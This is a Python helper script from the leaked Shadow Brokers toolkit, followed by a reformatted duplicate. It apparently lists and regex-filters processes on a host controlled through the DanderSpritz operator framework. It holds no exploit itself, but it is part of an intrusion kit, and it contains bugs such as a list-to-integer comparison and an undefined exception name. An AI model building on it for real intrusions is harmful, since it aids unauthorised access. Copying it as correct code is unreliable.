shadowbrokers-exploits/windows/Resources/Ops/PyScripts/psg.py


import dsz
import traceback, sys
from optparse import OptionParser
from collections import defaultdict
import re
import ops.cmd
from ops.pprint import pprint

def main():
    process_list = []
    if (len(sys.argv) > 1):
        pattern = (('.*' + sys.argv[1]) + '.*')
    else:
        pattern = '.*'
    print (('\nFiltering processes with regex:: ' + pattern) + '\n')
    regex = re.compile(pattern, (re.I | re.UNICODE))
    dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('processes -list')
    proc_items = cmd.execute()
    if cmd.success:
        for proc_item in proc_items.initialprocesslistitem.processitem:
            pid = str(proc_item.id)
            ppid = str(proc_item.parentid)
            name = str(proc_item.name.encode('utf-8'))
            path = str(proc_item.path.encode('utf-8'))
            user = str(proc_item.user.encode('utf-8'))
            c_time = str(proc_item.created.time)
            c_date = str(proc_item.created.date)
            process = [pid, ppid, path, name, user, c_date, c_time]
            if regex:
                tmp_str = ' '.join(process)
                if re.search(regex, tmp_str):
                    process_list.append(process)
    if (process_list > 1):
        pprint(process_list, header=['PID', 'PPID', 'Path', 'Name', 'User', 'CDate', 'CTime'])
    dsz.control.echo.On()
if (__name__ == '__main__'):
    usage = 'psg [regex]\n\t\t\t'
    try:
        main()
    except RuntimeError as ex:
        dsz.ui.Echo(('\n RuntimeError Occured: %s' % e), dsz.ERROR)
Inital commit of Shadowbrokers 'Lost in Translation' release 2017-04-14 09:45:07 +00:00
			`import dsz`
			`import traceback, sys`
			`from optparse import OptionParser`
			`from collections import defaultdict`
			`import re`
			`import ops.cmd`
			`from ops.pprint import pprint`

			`def main():`
			`process_list = []`
			`if (len(sys.argv) > 1):`
			`pattern = (('.' + sys.argv[1]) + '.')`
			`else:`
			`pattern = '.*'`
			`print (('\nFiltering processes with regex:: ' + pattern) + '\n')`
			`regex = re.compile(pattern, (re.I \| re.UNICODE))`
			`dsz.control.echo.Off()`
			`cmd = ops.cmd.getDszCommand('processes -list')`
			`proc_items = cmd.execute()`
			`if cmd.success:`
			`for proc_item in proc_items.initialprocesslistitem.processitem:`
			`pid = str(proc_item.id)`
			`ppid = str(proc_item.parentid)`
			`name = str(proc_item.name.encode('utf-8'))`
			`path = str(proc_item.path.encode('utf-8'))`
			`user = str(proc_item.user.encode('utf-8'))`
			`c_time = str(proc_item.created.time)`
			`c_date = str(proc_item.created.date)`
			`process = [pid, ppid, path, name, user, c_date, c_time]`
			`if regex:`
			`tmp_str = ' '.join(process)`
			`if re.search(regex, tmp_str):`
			`process_list.append(process)`
			`if (process_list > 1):`
			`pprint(process_list, header=['PID', 'PPID', 'Path', 'Name', 'User', 'CDate', 'CTime'])`
			`dsz.control.echo.On()`
			`if (__name__ == '__main__'):`
			`usage = 'psg [regex]\n\t\t\t'`
			`try:`
			`main()`
			`except RuntimeError as ex:`
			`dsz.ui.Echo(('\n RuntimeError Occured: %s' % e), dsz.ERROR)`